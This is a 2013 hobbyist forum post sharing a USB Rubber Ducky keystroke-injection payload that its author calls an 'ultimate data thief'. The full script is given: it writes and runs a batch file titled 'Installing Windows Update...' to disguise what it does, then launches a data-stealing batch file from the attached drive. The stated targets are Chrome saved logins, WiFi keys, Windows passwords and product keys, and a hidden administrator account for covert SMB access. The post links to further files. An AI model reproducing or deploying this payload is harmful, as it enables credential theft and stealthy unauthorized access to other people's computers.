UnKn0wnBooof Posted October 25, 2013 Share Posted October 25, 2013 Ok, so there's a lot of cool Ducky scripts out there, my personal favourite is the script that steals Windows passwords - AWSOME!!! But do any scripts aim to get more than just a Windows password? Do any of them "Backup" Google Chrome Login Data, WiFi keys, Windows Product Keys or Replace the Administrator password or even hide the account so you can have "stealthy" remote access via Windows Shares (Known as SMB)? I THINK PAYLOADS SHOULD DO MORE! So... I introduce the ULTIMATE DATA THEIF!!! Payload: DELAY 15000REM Author: Lavanoid VolcanicREM This script supports Windows XP as well as Vista and 7.REM I don't have Windows 8 (I really want it though) so I cant test it.REM This Script looks for the drive named "JUNK" because "DUCKY" is too exposing.GUI dDELAY 500GUI rDELAY 1500STRING notepad.exeDELAY 200ENTERDELAY 1500STRING @echo offDELAY 200ENTERDELAY 200STRING TiDELAY 200STRING tle = Installing Windows Update...DELAY 200ENTERSTRING @echo Installing Windows Update...DELAY 200ENTERSTRING set duck=DELAY 200ENTERSTRING COLOR F0DELAY 200ENTERSTRING :startDELAY 200ENTERSTRING if not "%LOCALAPPDATA%"=="" goto win_newDELAY 200ENTERSTRING for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "JUNK"') do set duck=%%ADELAY 200ENTERSTRING if "%duck%"=="" goto startDELAY 200ENTERSTRING set duck=%duck%:DELAY 200ENTERSTRING %duck%DELAY 200ENTERSTRING CD "Data"DELAY 200ENTERSTRING "SCRIPT_EX.exe" "SP.bat"DELAY 200ENTERSTRING EXITDELAY 200ENTERSTRING :win_newDELAY 400ENTERDELAY 400STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "JUNK"') do set duck=%%dDELAY 200ENTERSTRING if "%duck%"=="" goto startDELAY 200ENTERSTRING %duck%DELAY 200ENTERSTRING CD "Data"DELAY 200ENTERSTRING "SCRIPT_EX.exe" "SP.bat"DELAY 200ENTERSTRING EXITDELAY 200ENTERCTRL SDELAY 1500STRING %TEMP%\DS.batDELAY 1000ENTERDELAY 600ALT YDELAY 700ALT F4GUI rDELAY 1500STRING %TEMP%\DS.batENTERDELAY 1000ALT yDELAY 500ALT yDELAY 500ALT yDELAY 500ALT yDELAY 500ALT yDELAY 500ALT yDELAY 500ALT yGUI rDELAY 1200STRING explorer.exeENTERDELAY 1500ALT F4 Unfortunately, the forum only allows a maximum of 500kb of upload space and the extra data is just over 1MB so I put the file on my Dropbox account instead. Link: https://www.dropbox.com/sh/ad8jegywipd3l76/jo2KqlU3CB READ ME!!.txt contents: SCRIPT/PAYLOAD BY LAVANOID VOLCANIC THE DIRECTORIES ABOVE OR BELOW (DEPENDING ON YOUR CONFIGURATION) SHOULDBE COPIED TO THE ROOT DIRECTORY OF THE DUCKY DRIVE. YOU SHOULD EDITTHE SP.BAT FILE AND THE INJECT.TXT FILE TO SUIT YOUR REQUIREMENTS. FILE LOCATIONS: SP.bat -- Data\SP.batinject.txt -- Scripts\Projects\Steal_Data\inject.txtCompiler.bat -- Scripts\Compiler.bat COMPILER.bat description: The compiler batch file basically takes away the hassle of enteringall those annoying time draining commands. If the Compiler.bat fileis stored on the Duck, the compiler will ask if you want to install iton the Duck. WHAT I HOPE: I hope that my project will be featured in one of the Hak5 videossince I do like some attention. THIS WORLD IS LONELY YOU KNOW!! Thank you for choosing to spend a bit of your time bypoking your nose into my work. Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.